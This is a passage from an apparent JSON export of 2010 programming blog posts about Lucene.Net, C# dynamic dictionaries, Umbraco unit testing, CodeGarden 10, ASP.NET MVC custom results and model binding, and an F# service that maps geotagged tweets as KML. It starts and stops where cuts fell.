I’m pushing data into it but really the end result display is all handled by my other data store, web servers.\nI’ll publish the source code in a little while, along with a downloadable version of this application, but at the moment there’s a few things I need to do, like updating the index as new posts are added and properly binding the data to the UI :P.\nBut hopefully this gives you a view at how you can use Lucene in your own applications.\n", "id": "2010-07-10-building-an-application-with-lucene-net" }, { "title": "Dynamics Library", "url": "https://www.aaron-powell.com/posts/2010-07-05-dynamics-library/", "date": "Mon, 05 Jul 2010 00:00:00 +0000", "tags": [ "dynamic", ".net", "c#" ], "description": "A series of helper methods for working with the DLR in C# 4.0", "content": "When playing with the dynamic keyword and the DLR at CodeGarden 10 I realised that I wanted to do more with it so I started to dig deeper into it. This is where I came up with the idea which I covered in Dynamic Dictionaries with C# 4.0.\nAs some people I’ve talked to since then pointed out what I did was lacking a few things. I told them to be quiet as the blog was only meant to be a quick introduction into the DynamicObject and some of the power which it brings to the table. But really, I was keeping some stuff in reserve, I was working on a more complete API for working with dynamic dictionaries.\n##Introducing AaronPowell.Dynamics\nI decided to put together a set of handy extensions for working with the DLR, a more complete version of the dynamic dictionary which I talked about, and a fluent dynamic XML API.\nI’ve checked the code up on bitbucket so you can grab a copy yourself and get playing with it (or provide me with feedback :P). You can grab it here. And if you want to just get started with the API grab it here.\n##Working with the API\nSo obviously if you’re going to grab a copy you probably want to know what it is. The API contains:\nAaronPowell.Dynamics.Collections.DynamicDictionary AaronPowell.Dynamics.Collections.DynamicKeyValuePair AaronPowell.Dynamics.Xml.XmlNode AaronPowell.Dynamics.Xml.XmlNodeList Additionally each namespace contains extension methods to allow you to convert your static objects into dynamic objects.\n###DynamicDictionary\nThis is what the API is really all about, and it’s using some of the code which I started with in my other article, but I’ve added more to it, like the ability to write to it, and perform standard dictionary operations. I’ve got a series of tests which show what it can do, such as:\n[TestMethod] public void DynamicDictionaryTests_Key_Maps_To_Property() { //Arrange Dictionary<string, string> items = new Dictionary<string, string>(); items.Add("someKey", "someValue"); //Act dynamic d = items.AsDynamic(); //Assert Assert.AreEqual(items["someKey"], d.someKey); } So you can access via a key in the dictionary. 
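Outside of a test the same access pattern reads quite naturally; a quick sketch (the dictionary contents here are made up):

var settings = new Dictionary<string, string>
{
    { "theme", "dark" },
    { "pageSize", "20" }
};

dynamic config = settings.AsDynamic();
Console.WriteLine(config.theme);    // "dark"
Console.WriteLine(config.pageSize); // "20"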
Or maybe you want to add new keys:\n[TestMethod] public void DynamicDictionaryTests_New_Key_Added_Via_Property() { //Arrange Dictionary<string, string> items = new Dictionary<string, string>(); //Act dynamic d = items.AsDynamic(); d.hello = "world"; //Assert Assert.AreEqual("world", d.hello); } That’s right, it’s mutable (assuming the source dictionary was mutable, the AsDynamic extension method is on IDictionary<string, TValue> so you can use custom dictionaries).\nAnd DynamicDictionary inherits from IDictionary<string, TValue> so all other standard dictionary object modifiers can be used, it’s an Enumerable object, it’s got count, etc.\n####Performance\nJust a bit of a footnote don’t turn all dictionaries into dynamic ones! Unsurprisingly performance does take a hit when working with the DynamicDictionary object, it’s ~4 times slower than the static one when doing 1 million iterations (you can check out the demo app).\n###Dynamic XML\nThis I can’t actually take credit for, it’s actually modeled off a piece of code by Nikhil Kothari which he wrote for working with RESTful API’s. The problem was that his code doesn’t work with the RTM of C# 4.0, so I’ve made that happen, and I’ve added a few more features, like better handling of children node sets.\nAgain I have a few tests which cover this, and it makes working with XML a much nicer experience, like:\n[TestMethod] public void XmlNodeTests_Attribute_Exposed_As_Member() { //Arrange var xdoc = XDocument.Parse("<node attr='something'></node>"); dynamic node = xdoc.Root.AsDynamic(); //Act //Assert Assert.AreEqual("something", node.attr); } Fluent attribute access, or how about fluent element access?\n[TestMethod] public void XmlNodeTests_Elements_Exposed_As_Members() { //Arrange var xdoc = XDocument.Parse("<node><child>value of child</child></node>"); dynamic node = xdoc.Root.AsDynamic(); //Act //Assert Assert.AreEqual("value of child", node.child); } But I’ve decided to knock it up a notch (BAM!) and added a cooler way to interact with collections. I mean, if you have many children called other, you just want the others right?\n[TestMethod] public void XmlNodeTests_Pluralized_Children_Via_Pluralized_Word() { //Arrange var xdoc = XDocument.Parse("<node><other /><other /><other /></node>"); dynamic node = xdoc.Root.AsDynamic(); //Act var others = node.others; //Assert Assert.IsNotNull(others); Assert.IsInstanceOfType(others, typeof(XmlNodeList)); Assert.AreEqual(3, others.Length); } The pluralization isn’t an exact science (I’ve used the same logic which is used the same logic which is used by SqlMetal) so something like Child doesn’t become Children.\n##Conclusion\nSo that raps it up for the introduction to my new API. It’s just a bit of fun, something to be used carefully (like all of the DLR :P) and hopefully someone finds it a bit of fun.\n", "id": "2010-07-05-dynamics-library" }, { "title": "Documents in Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-07-03-documents-in-lucene-net/", "date": "Sat, 03 Jul 2010 00:00:00 +0000", "tags": [ "lucene.net", "c#" ], "description": "", "content": "As you’re most likely already aware Lucene.Net is a Document Database, which means that it’s essentially a key/ value store, with the crux of the interaction through Documents\n##But what is a Document?\nWhat needs to be understood about the Document concept in Lucene.Net is that is doesn’t have anything to do with a file, it’s not a PDF, a DOCX, or a XLSX. It’s just a key/ value store. 
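To make that concrete, a Document is really just a bag of named string values; here's a minimal sketch using the same Lucene.Net 2.9-era API that the rest of these posts use:

```csharp
using Lucene.Net.Documents;

// A Document is nothing more than a collection of named Fields
var doc = new Document();
doc.Add(new Field("title", "Documents in Lucene.Net", Field.Store.YES, Field.Index.ANALYZED));
doc.Add(new Field("author", "Aaron Powell", Field.Store.YES, Field.Index.NOT_ANALYZED));

// And getting a value back out is just a key lookup
var title = doc.Get("title");
```

There's no notion of a PDF, a Word document or any other file format in there, just keys and values.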
As I pointed out in my overview of Lucene.Net this framework is agnostic of anything like that.\nBut unlike other Document Databases, such as RavenDB, Lucene.Net doesn’t allow you to put just any object into it; you need to do it via a Document. Once a Document is inserted into the Lucene index it is given a unique identifier (a numerical ID) and the data on the Document is stored.\n##Data on a Document\nPushing data into a Lucene index is done via Fields. A Field is a key/value pair if you want to take a very high-level view of it, but it’s really a bit more powerful than that. It’s true that its primary responsibility is to push data into Lucene with a string key and a string value, but it also provides information to Lucene about how to store that data in the index.\nWhen you’re adding a Field to Lucene.Net you need to work out which of the available constructors to use, as there are 9 (yes, 9!) different choices. Personally I like this particular constructor:\npublic Field(string name, string value, Store store, Index index) I find that it gives the most flexibility and is the most obvious as to what it’s doing (it’s not the one we use internally in Examine; we actually use a different one as we want to work with TermVectors).\nOn top of the name (key) and value parameters there are also three others, Store, Index and TermVector. Each of these is used to define how the data is handled within the Lucene index.\nAlso, this is where we start getting into the part of Lucene.Net that I really don’t like, static fields (I miss enums…).\n###Store\nWhen first coming across Lucene the point of Field.Store is a bit confusing; it has two options, YES and NO (ok, it does have a third, COMPRESS, but it’s been deprecated in the Java version of Lucene and replaced by a separate API which is available in Lucene.Net - Lucene.Net.Documents.CompressionTools).\nInitially these two options are confusing: why would you be putting data into a Field if you don’t want it stored? Seems a bit strange… But it comes down to what you’re using Lucene.Net for, and having an understanding of that will give you an understanding of what you need to set as your Field.Store value.\nIf you’re using Lucene.Net as a full storage model, a complete replacement of another storage model (such as a relational database), then you want to set it to Store.YES. This tells Lucene to store the value of the field, not just the tokenized version of it.\nIf you are using Lucene.Net as just a search engine, and maintaining the actual data in a separate data store, then you can get away with setting Store.NO. This means that when you are ‘hydrating’ your entity from a search you’ll be going elsewhere to get the actual data that is required. Essentially you’re doing a two-phase hydration, first finding your entities using Lucene, and then getting their data from your data store.\n###Index\nThe Index parameter allows you to specify how the data is treated when it’s added to your Lucene index, and this will also affect the searching against it. Selecting the right Index type will also impact the size of your index.\nThere are 5 types of indexing, so let’s start with the basic one, NO. This one is fairly obvious, and it does what you’re expecting. If you set your field with an Index.NO value it’s not going to be accessible via the Lucene searcher. 
If you’re working directly with the Document object then you can still get at the data (provided it’s Store.YES :P); it’s accessible via the name of the Field.\nThe other options are about the analysis of the Field data in the index. I’ve looked at Analyzers in the past so hopefully it’s a concept you’re familiar with. Again, choosing the right option here will impact the size of the index.\nHere are a few good rules on whether to use analysis or not with your Field:\nAnalyze if:\n- The value contains multiple keywords\n- The data is to be searched in multiple different ways (such as fuzzy, boosting, etc)\n- The data does not need to be sorted against\nDon’t analyze if:\n- The value will only be a single word (and not a fuzzy word)\n- The value contains multiple words but requires sorting\nNORMS/NO_NORMS really comes down to what you need to do with the value when you’re searching. If you use NO_NORMS then the value isn’t normalized and features such as boost and string-length won’t be enabled.\nIn this article I’ve had a look at how the Field.Store and Field.Index can be used to make a simple application using Lucene.Net.\n###TermVector\nI thought I’d cover this even though I tend to let the default (TermVector.NO) get used. TermVector is used to indicate whether you want to have metadata about the terms which you’re putting into your index. A term is the value (or values if it’s an analyzed Field).\nThis can be handy if you want to know whether what’s being put into the index contains the same term multiple times, and whether you’re potentially getting false-positives in your search. It allows you to see how many times a term exists in a Document (TermVector.YES), or you can go one step further and have it store the position in the Field value at which the term appears (TermVector.WITH_POSITIONS) or an offset for where the term appears in the value (TermVector.WITH_OFFSET), and lastly you can go all out with TermVector.WITH_POSITIONS_OFFSETS.\nUse this sparingly, as it can blow out the size of your index if you store everything about everything!\n##Conclusion\nSo to finish off, this time we’ve looked at the Document side of a Document Database. Understanding Documents and Fields will allow you to start getting the full power out of the Lucene.Net API.\n", "id": "2010-07-03-documents-in-lucene-net" }, { "title": "Unit Testing with Umbraco", "url": "https://www.aaron-powell.com/posts/2010-06-29-unit-testing-with-umbraco/", "date": "Tue, 29 Jun 2010 00:00:00 +0000", "tags": [ "umbraco", "asp.net", "unit-testing", "webformsmvp" ], "description": "A wrap up from my talk on doing unit tested ASP.NET with Umbraco", "content": "At CodeGarden 10 I did a presentation on Unit Testing with Umbraco which was primarily looking at doing Unit Testing with ASP.NET and then how you can take those principles into doing development with Umbraco.\nUnfortunately the session ran way over time, but we had a good open space the following morning to look deeper into the stuff I didn’t have a chance to cover.\nThe crux of my session was around using ASP.NET WebForms MVP which I’ve written articles on in the past, including how to do presenters in F# :P.\n##Unit Testing with Umbraco\nWhen doing unit testing with Umbraco there are a few things you need to take into account:\n- Reliance on the HttpContext\n- Static methods\nBecause of these things it’s quite tricky to stub out a type which is reliant on static methods; you really need to use some kind of isolation framework like Typemock. 
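The usual alternative to an isolation framework is to hide the static call behind a small interface that you own, which is also the style of thing Snapshot (covered below) does for you. A rough sketch, where the ILinkService name is just for illustration:

```csharp
// Production code delegates to the static Umbraco API...
public interface ILinkService
{
    string NiceUrl(int nodeId);
}

public class UmbracoLinkService : ILinkService
{
    public string NiceUrl(int nodeId)
    {
        return umbraco.library.NiceUrl(nodeId);
    }
}

// ...while tests hand the presenter a stub of ILinkService instead,
// so no HttpContext or XML cache is needed to exercise the logic.
```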
And if you’re relying on the HttpContext then you need to either spin up Cassini/ IIS, or try and mock it out.\nNodeFactory is a tricky beast, it expects the XML cache, so if you don’t have it where it thinks it should be, then it’s not going to make your life easy.\n###Looking into Snapshot\nIn the past I’ve blogged via my work blog, FarmCode.org, we’re working on a new product called Snapshot which is designed to push out a plain ASP.NET website with no Umbraco reliances at all. During CodeGarden 10 we decided to release part of Snapshot for free, the CMS API, which is designed to abstract away the Umbraco aspect and gives you the ability to do unit testing.\nSnapshot exposes most of what can be done with NodeFactory, Media and umbraco.library, but does so via interfaces. This means that they can be stubbed out and used for testing.\n##Working with ASP.NET WebForms MVP\nSo I wasn’t just using the standard ASP.NET WebForms MVP install, I was also using the Contrib project which I contribute on. I was using this for the Autofac integration, as I wanted to be able to dependency inject more than just the view.\n##Resources from the presentation\nHere’s what you’ll need from my presentation to be able to dig into it yourself:\nSlide Deck Source Code Video Hopefully this gives you a good start for doing unit testing your own Umbraco development.\n", "id": "2010-06-29-unit-testing-with-umbraco" }, { "title": "Dynamic Dictionaries with C# 4.0", "url": "https://www.aaron-powell.com/posts/2010-06-28-dynamic-dictionaries-with-csharp-4/", "date": "Mon, 28 Jun 2010 00:00:00 +0000", "tags": [ "c#", ".net", "dynamic", "umbraco" ], "description": "Using the C# dynamic features to make it easier to work with Dictionary objects", "content": "Have you ever been working with the Dictionary<TKey, TValue> object in .NET and just wanted to find some way in which you can do this:\nvar dictionary = new Dictionary<string, string> { { "hello", "world!" } }; ... var something = dictionary.hello; It’d be sweet, but it’s not possible. The dictionary is just a bucket and there isn’t a way it can know at compile type about the objects which are within it. Damn, so you just have to go via the indexer of the dictionary.\nBut really, using dot-notation could be really cool!\nWell with the .NET 4.0 framework we now have a built in DLR so can we use the dynamic features of the C# 4 to this?\n##Introducing the DynamicObject\nWell the answer is yes, yes you can do this, and it’s really bloody easy, in fact you can do it in about 10 lines of code (if you leave out error checking and don’t count curly braces :P).\nFirst off you need to have a look at the DynamicObject which is in System.Runtime. There’s a lot of different things you can do with the DynamicObject class, and things which you can change. For this we are going to work with TryGetMember, with this we just need to override the base implementation so we can add our own dot-notation handler!\nSo lets start with a class:\nusing System; using System.Collections.Generic; using System.Dynamic; namespace AaronPowell.Dynamics.Collections { public class DynamicDictionary<TValue> : DynamicObject { private IDictionary<string, TValue> dictionary; public DynamicDictionary(IDictionary<string, TValue> dictionary) { this.dictionary = dictionary; } } } Essentially this is just going to be a wrapper for our dynamic implementation of a dictionary. 
So we’re actually making a class which has a private property which takes a dictionary instance into the constructor.\nNow we’ve got our object we need do some work to get it handle our dot-notation interaction. First we’ll override the base implementation:\npublic override bool TryGetMember(GetMemberBinder binder, out object result) { var key = binder.Name; if (dictionary.ContainsKey(key)) { result = dictionary[key]; return true; } throw new KeyNotFoundException(string.Format("Key \\"{0}\\" was not found in the given dictionary", key)); } And you know what, we’re actually done! Now all you have to do:\nvar dictionary = new Dictionary<string, string> { { "hello", "world!" } }; dynamic dynamicDictionary = new DyanmicDictionary(dictionary); Console.WriteLine(dynamicDictionary.hello); //prints 'world' I’m going to be releasing the source for this shortly (well, an improved version), along with a few other nifty uses for dynamic. So keep watching this space for that ;).\n##Umbraco\nWhile we were working on some sexy features for Umbraco 5 over the CodeGarden 10 retreat we kept saying that we should look at using as many of the cool new .NET framework features which we can possibly get away with. To this extent we kept saying we need to work out how to implement the dynamic keyword in some way.\nWell that’s where the idea for the above code came from, in fact we’ve got a similar piece of code which will be usable within the framework of Umbraco 5 and entity design. But the full info on that will belong to another post ;).\n##Released!\nI’ve rolled the above code (with some improvements mind you) into a new project that I’ve been working on for making working with dynamics in .NET a whole lot easier. You can check out my Dynamics Library and get dynamacising.\n", "id": "2010-06-28-dynamic-dictionaries-with-csharp-4" }, { "title": "CodeGarden 10", "url": "https://www.aaron-powell.com/posts/2010-06-27-codegarden-10/", "date": "Sun, 27 Jun 2010 00:00:00 +0000", "tags": [ "umbraco", "codegarden", "cg10" ], "description": "A look at CG10 and just how awesome it was", "content": "Well CodeGarden, the yearly Umbraco festival, has come and gone for another year and it’s getting bigger and better each year.\nThis was the first time there’s been a three-day event which was CodeGarden, with the first day being an ASP.NET MVC bootcamp day which had Simone Chiaretta, Jon Galloway and Steven Sanderson ran two tracks, one for the beginners of MVC and one for the advanced MVC users. I must admit I missed a fair bit as I was frantically going over my code for the keynote, unit testing talk, linq vs xslt battle and Umbraco v5.\nBut there was some really awesome stuff covered which has given us so really good ideas for v5.\nOne other excitement this year was that day 1 and day 2 were completely recorded and Umbraco HQ will be releasing the videos soon for everyone to enjoy, and this does include the MVC stuff!\nThere was also a Flickr stream set up so you can view the photographic history of the three days!\n##A day of sessions\nThe main day of CodeGarden 10 was opened by Alexander Kjerulf who is the Chief Happiness Officer of Positive Sharing. It was an awesome start to the day and really got the vibe of the rest of the day running. Alex had some great points, about putting the employees happiness first and their happiness will translate into customer happiness just makes sense. 
I really recommend that you check out the session.\nNext on stage was the man of the hour, Niels Hartvig who had some awesome stats about Umbraco, which is averaging 1000 downloads per day. Wow, really wow… He was then joined by Per who gave a great demo of the released while we watched our.umbraco.org v2. Some of the new features like a new skin (made of sex), better notification and posting solutions (I think I saw some inspirations from stackoverflow there too :P) and the move of the package repo from being an Umbraco HQ managed feature to a community managed feature. Now any package which achieves a vote of 15 or more will be downloadable from within Umbraco itself!\nAfter a round of applause for this years Umbraco MVP’s (well done Dirk, Lee, Warren, Richard and Doug!) it was time for yours-truely to jump on-stage for my first-of-three presentations of the day. I gave a quick run down of how to do LINQ to Umbraco to make a simple photo gallery using CWS.\nOnce I was done it was time for Shannon Deminick to take his turn and show off Examine and then he was awarded the honor of Umbraco Core Member of the Year. Considering all the hard work he’s done (Client Dependency, Examine, the new tree, unit tested data layer, and quite a few more things) it’s completely deserved and I’m sure he’s not going to be bringing that coffee machine to work to share (luckily I don’t drink coffee :P).\nThe keynote was then wrapped up with the announcement that Umbraco 4.1 was not being released, but instead we’ve bumped the version number up to 4.5, which is now available. It’s so damn sweet and you really should check it out. If you’re not using this on every new Umbraco project then I think you’re just mad!\nOnce the Keynote wrapped up Shannon was back on stage to give his Examine talk. On the main stage, to a really large audience he went well, and there was some great feedback at the end of the talk. I may be biased but Examine is a day sexy piece of software.\nAfter lunch it was my turn, I gave my talk on Unit Testing with Umbraco, which was to a standing-room-only crowd! I was psyched at the number of people who turned out for it and to keep with my standard tradition of talks I was epicly over time (I blame the fact that we were running late anyway :P). Because of this we took the discussion into an Open Space for the following day.\nI’ll be posting up the code and a more in-depth look at the topics shortly.\nI was bouncing through the other sessions for that afternoon and frantically preping for the LINQ vs XSLT battle which was during dinner (and also trying to get a sneak peak at what Warren was going to do :P).\nDuring dinner the battle was on, LINQ was showing off intellisense and compile-time validation, while XSLT was showing off quick turn around time of editing and near immediate change results. The first round was taken out narrowly by Warren because it is just quicker to hit and Umbraco UI and edit rather than spin up Visual Studio and Cassini. I took out testing as to get a really rich experience it’s gotta be Visual Studio and well, that’s .NET’s domain ;). The last round was a tie, although I debate the validity of an XSLT interacting with a database :P.\nThe conclusion of the battle was that you really need to find the right tool for the job, parsing XML to do UI is just perfect in XSLT, but for interacting with an external system .NET really can’t be beat.\n##The day of community events\nThe final day of CodeGarden 10 was the traditional day of open space sessions. 
And again I was spending the day with my speakers hat on!\nFirst up I was doing a Q & A from my Unit Testing with Umbraco talk, looking at how to use WebForms MVP, debating MVC vs MVP (which I think is a mute point) and avoiding questions about Umbraaco v5.\nThis was followed up by the session on Why You Shouldn’t Use Umbraco. It was a great topic and at lot of good discussion of why Umbraco isn’t the always the right tool.\nThen Alex Norcliffe and I (well, mostly Alex :P) frantically worked to get the Umbraco v5 talk ready and he just fell short of getting a good code demo working (he did later that day :P). And yet again to packed out room we talked Umbraco v5. We looked at the architecture which we’re going with and then doing a long Q & A session to get community feedback on what people want to get from v5. We were really excited with the feedback and we’re working really hard to get more stuff sorted for it.\nLastly we finished off the day with the traditional Umbraco package competition and (new this year) the Umbraco skin competition.\nSebastiaan Janssen took out third place with his Image Meta Data package (great for photographers), I took out 2nd place with a package I created for TheFARM, TheFARM Media Link Checker, and Shannon took it out with a multi-tree picker which he wrote that morning for an open-space session, no wonder he’s core developer of the year! Big thanks to all who clapped loudly and Microsoft for the XBox 360 prize!\nFor the skin contest the UI master Warren Buckley took it out with his awesome retro theme of skinning Umbraco to look like a 1990’s GeoCities website built by some 12 year old kid. Let’s hope he releases it to download :P!\n##Wrapping up\nCodeGarden 10 is by far the most fun festival I’ve been to recently. Notice how I keep referring to it as as a festival not a conference. This is because it is more about celebrating Umbraco, celebrating the evangelists, celebrating the MVP’s and celebrating the community.\nWell done to Umbraco HQ for getting it organised and well done to everyone who presented. It sucks that we’ve got to wait 12 months before we get to do it all again!\n", "id": "2010-06-27-codegarden-10" }, { "title": "ASP.NET MVC XML Action Result", "url": "https://www.aaron-powell.com/posts/2010-06-16-aspnet-mvc-xml-action-result/", "date": "Wed, 16 Jun 2010 00:00:00 +0000", "tags": [ "asp.net", "asp.net-mvc", "c#", "xml" ], "description": "An easy way to return XML from ASP.NET MVC", "content": "For my Location Service in F# I needed a way to be able to return XML from MVC (which powers my site), but I couldn’t find a way to do this out of the box with XML.\nLuckily creating your very own ActionResult is really quite easy in MVC.\nFirst you need to implement the ActionResult class:\npublic class XmlActionResult : ActionResult { public override void ExecuteResult(ControllerContext context) { } } I’m going to add a couple of public properties:\npublic XDocument Xml { get; private set; } public string ContentType { get; set; } public Encoding Encoding { get; set; } I’ve put the ContentType publicly settable so you can customize the content type which will be set on the response. 
And I’ll have a constructor which takes the XDocument:\npublic XmlActionResult(XDocument xml) { this.Xml = xml; this.ContentType = "text/xml"; this.Encoding = Encoding.UTF8; } Here I’ve set the default ContentType as text/xml so that’s what’ll generally be returned from the ActionResult.\nAnd implementing ExecuteResult is really quite simple:\npublic override void ExecuteResult(ControllerContext context) { context.HttpContext.Response.ContentType = this.ContentType; context.HttpContext.Response.HeaderEncoding = this.Encoding; XmlTextWriter writer = new XmlTextWriter(context.HttpContext.Response.OutputStream, Encoding.UTF8); Xml.WriteTo(writer); writer.Close(); } All you have to do is to write the XML into the Response stream (you can’t just return the XML, if you do you’ll strip out the XML declaration).\nTo then use it in your View it’s just like this:\nvar kml = AaronPowell.FindMe.KmlGenerator.TwitterToKml("@" + twitterUser + " tracking", statuses); return new XmlActionResult(kml) { ContentType = "application/vnd.google-earth.kml+xml" }; And that’s why I left the ContentType as modifiable, it means I can say that I’m sending out KML instead of standard XML. You can easily use this for RSS, Atom, etc. In fact I should probably port the RSS feed within this site :P.\n", "id": "2010-06-16-aspnet-mvc-xml-action-result" }, { "title": "Creating a location service with F# and Twitter", "url": "https://www.aaron-powell.com/posts/2010-06-16-location-service-with-fsharp-and-twitter/", "date": "Wed, 16 Jun 2010 00:00:00 +0000", "tags": [ "f#", "twitter", "geo-location" ], "description": "Using Twitter to stalk someone has never been so easy!", "content": "A while ago Tatham Oddie sent me a small app he’d built which allowed you to find recent locations which he had been at, data which is scraped via twitter (you can see it here). It’s rather a nifty little thing and it’s done with approximately 50 lines of ruby (although I must point out that he is using some external libraries which do mean that he’s got a lot more code, just not all his :P).\nI’d always contemplated having a crack at doing something like this as it’s a good way to investigate some functional programming.\nWell while sitting in the Qantas club lounge waiting for my flight back from Remix earlier this month I decided to write it, using F#. Hey, why the hell not!\nGetting started So today I finally got around to finishing the code and deploying it onto my website, in fact you can see it in action via https://www.aaron-powell.com/findme. I’ve also made this in a way which you can test with any username, say, Tatham’s - https://www.aaron-powell.com/findme/tathamoddie.\nI also added support for Twitter lists, so say, readify - https://www.aaron-powell.com/findme/digory/readify.\nWhat you’ll see is that this is actually just a redirect to Google Maps, passing in a URL like https://www.aaron-powell.com/findme/kml/slace. 
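Behind that URL there isn't much more than an MVC action gluing the F# library to the XmlActionResult from the previous post. This is a rough sketch only: the controller name and the Twitter module name are mine, and it glosses over the geotag filtering covered below:

```csharp
using System.Web.Mvc;

public class FindMeController : Controller
{
    // Handles /findme/kml/{username}
    public ActionResult Kml(string username)
    {
        // Pull down the recent statuses via the F# library
        var statuses = AaronPowell.FindMe.Twitter.TwitterStatusGet(
            "http://api.twitter.com/1/statuses/user_timeline.xml?screen_name=" + username + "&count=200");

        // Turn them into KML and hand it to the custom ActionResult
        var kml = AaronPowell.FindMe.KmlGenerator.TwitterToKml("@" + username + " tracking", statuses);

        return new XmlActionResult(kml) { ContentType = "application/vnd.google-earth.kml+xml" };
    }
}
```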
If you hit this URL you’ll get back an XML file, well actually you’ll get back a KML file, which stands for Keyhole Markup Language.\nKML KML is the markup language for geo-location which Google is backing (in fact Keyhole is the original name of the company which Google Earth came from), and all it does is defines a series of points and a series of styles.\nThis is what a basic KML file looks like:\n<?xml version="1.0" encoding="utf-8" standalone="yes"?> <kml> <Document> <name>@slace tracking</name> <Style id="icon-000"> <IconStyle> <color>ffffffff</color> <colorMode>normal</colorMode> <Icon> <href>http://aaron-powell.com/get/map-pins/0010.png</href> </Icon> </IconStyle> </Style> <Placemark> <name>001. Wed 16 Jun 09:42:11 2010</name> <styleUrl>#icon-000</styleUrl> <Point> <coordinates>151.25144901, -33.91480491</coordinates> </Point> </Placemark> </Document> </kml> As you can see I define a style element (which has an image) and a point (which has the longitude and latitude).\nIf you want to learn more about KML I suggest you look here.\nGetting our data As I mentioned this app is scrapping via twitter, and if you’re using twitter you’re probably aware that you can choose to geotag your tweets, most twitter clients support this.\nAll I’m doing is using some of the public REST API’s which twitter has to pull down the data I require, and then filtering it for what I want.\nLooking at some code So we need to scrape some data from twitter. To do this you can use an existing .NET API such as TweetSharp, but at the moment I’ve rolled my own very basic twitter API in F# (also, as part of my learning experience).\nDisclaimer - I don’t suggest writing a full API in F#, it’s definitely not the best language for class libraries :P\nI’ve made a simple little method which you can invoke from my API which takes a URL and gives you back the various statuses:\nlet TwitterStatusGet (url:string) = let webRequest = HttpWebRequest.Create url // set the method to GET webRequest.Method <- "GET" // set up the stream let reqStream = webRequest.GetResponse() reqStream.Headers.Add(HttpResponseHeader.CacheControl, "public, max-age=300") let streamReader = new StreamReader(reqStream.GetResponseStream()) let response = streamReader.ReadToEnd() // close the stream reqStream.Close() streamReader.Close() let xml = XDocument.Parse(response) xml.Descendants(!!"status") |> Seq.map(fun e -> new Status(e)) So this is defining a method named TwitterStatusGet which has a String input value. This is passed to the HttpWebRequest.Create method, and then we invoke the request and turn the response into XML. We then take the tranformed XML, find all the descendants with the name status and then turn them into a .NET type which I’ve created (the internals of it are irrelevant here), and then returns them.\nThe method Seq.map is essentially an F# version of the IEnumerable.Select.\nThen we need to filter them for ones which haven’t been geotagged:\nlet statuses = TwitterStatusGet ("http://api.twitter.com/1/statuses/user_timeline.xml?screen_name=" + username + "&count=" + count.ToString()) let taggedStatuses = statuses |> Seq.filter(fun e -> e.Geo.Lat <> 0.0) Then I just add a bit of code to get rid of statuses which are next to each other (saying to had several tweets from the same place isn’t very interesting):\nlet points = new List<Status>() for i in 0 .. 
taggedStatuses.Count()-1 do let curr = taggedStatuses.ElementAt(i); if points.Count > 0 then let prev = points.ElementAt(points.Count-1) if calculate_displacement prev.Geo curr.Geo > 0.5 then points.Add(curr) else points.Add(curr) To do this I’ve got a funky little method for calculating the distance between two points:\nlet rad deg = deg*(Math.PI/180.0) let calculate_displacement (point1: LatLon) (point2: LatLon) : float = let radius = 6371.0 let dLat = rad(point2.Lat-point1.Lat) let dLon = rad(point2.Lon-point1.Lon) let a = Math.Sin(dLat/2.0) * Math.Sin(dLat/2.0) + Math.Cos(rad(point1.Lat)) * Math.Cos(rad(point2.Lat)) * Math.Sin(dLon/2.0) * Math.Sin(dLon/2.0) radius * (2.0 * Math.Atan2(Math.Sqrt(a), Math.Sqrt(1.0-a))) I’m sure I could write this is a much F#-y way, and if someone wants to do that please show me how, but we’re just doing some simple calculations based on the points and then returning the distance between them.\nThe last piece of the puzzle is tranforming the unique points which we now have into KML. I’m going to spare that bit of code for the moment, I’m using LINQ to XML to do this, and working with LINQ to XML in F# requires a whole blog post of its own.\nPutting it all together So now that I’ve got all this data I can now just add a reference into my blog project which then return the data. I’ve noticed that Google Maps has a very quick timeout which means that sometimes you’ll get an error for your requests, but hit it again after a minute or two and it generally comes back. Also, I’ve added a 1 hour output cache on each request so if you do new tweets they wont appear immediately.\nI just set up a few simple routes which support both username and list name passing.\nAnd there you go, that’s how you can use twitter to scrape the data about where someone has been tweeting from. Feel free to use my service, I’m thinking of setting up a CG10 list which you can then track people who are coming to CodeGarden this year ;).\n", "id": "2010-06-16-location-service-with-fsharp-and-twitter" }, { "title": "ASP.NET MVC Model binding with implicit operators", "url": "https://www.aaron-powell.com/posts/2010-06-14-aspnet-mvc-model-binding-with-implicit-operators/", "date": "Mon, 14 Jun 2010 00:00:00 +0000", "tags": [ "asp.net", "asp.net-mvc", "c#", "model-binding" ], "description": "Using implicit operators in model binding with ASP.NET MVC", "content": "In the past I’ve had a bit of a play around with operators, I looked at explicit and implicit operators and it’s really quite powerful.\nWhen I upgraded my website to be powered by PaulPad, and upgraded PaulPad to ASP.NET MVC2 I ran into a problem, Paul uses implicit model binding to handle the URLs. The problem was that the ModelBindingContext changed between MVC1 and MVC2, resulting in the implicit operator binding implementation failing to compile!\nA quick look at Model Binding Without going too in-depth into what Model Binding is all about, essentially it’s how to map the posted data from a form to a .NET object. It’s great if you want to handle custom objects from UI to back-end. 
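For context, the kind of "custom object" in play here is a small wrapper type that knows how to build itself from a string via an implicit operator. A hypothetical example (PaulPad's real types will differ):

```csharp
public class Slug
{
    public string Value { get; private set; }

    private Slug(string value)
    {
        Value = value;
    }

    // Compiled to a static op_Implicit method, which is what the binder below goes looking for
    public static implicit operator Slug(string value)
    {
        return new Slug((value ?? string.Empty).Trim().ToLowerInvariant());
    }
}
```

With a binder like the one below registered, an action method can take a Slug parameter directly and the conversion from the raw route value happens for you.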
It’s not as required in MVC2 as it was in MVC1, but if you want to do something like implicit operators, well that’s where we’re going to need it.\nIf you want to learn more on Model Binding you can just Google it with Bing.\nImplementing implicit Model Binding To get started we need to make a class that inherits from IModelBinder:\npublic class ImplicitAssignmentBinder : IModelBinder { public object BindModel(ControllerContext controllerContext, ModelBindingContext bindingContext) { throw new NotImplementedException(); } } So now that we’ve got our stub type we need to start implementing it. The first thing we need to do is see if we’ve got an implicit operator between our CLR types. We can do this with a few simple LINQ statements:\nvar implicitAssignment = bindingContext.ModelType.GetMethods(BindingFlags.Public | BindingFlags.DeclaredOnly | BindingFlags.Static) .Where(x => x.Name == "op_Implicit") .Where(x => bindingContext.ModelType.IsAssignableFrom(x.ReturnType)) .FirstOrDefault(); Here we’re using reflection to look for an implicit operator. If you’re using reflection to locate an operator they are always prefixed with op_, and if you’re looking for an implicit operator, then it’s named Implicit (explicit operators are op_Explicit).\nNext we need to find one which is an implicit cast to the type we actually wanting to return. This is provided to us from the bindingContext information which we are provided with.\nThen we just grab the first (or default), as there will only ever be zero or one match (we could use SingleOrDefault, but FirstOrDefault is slightly faster).\nAll 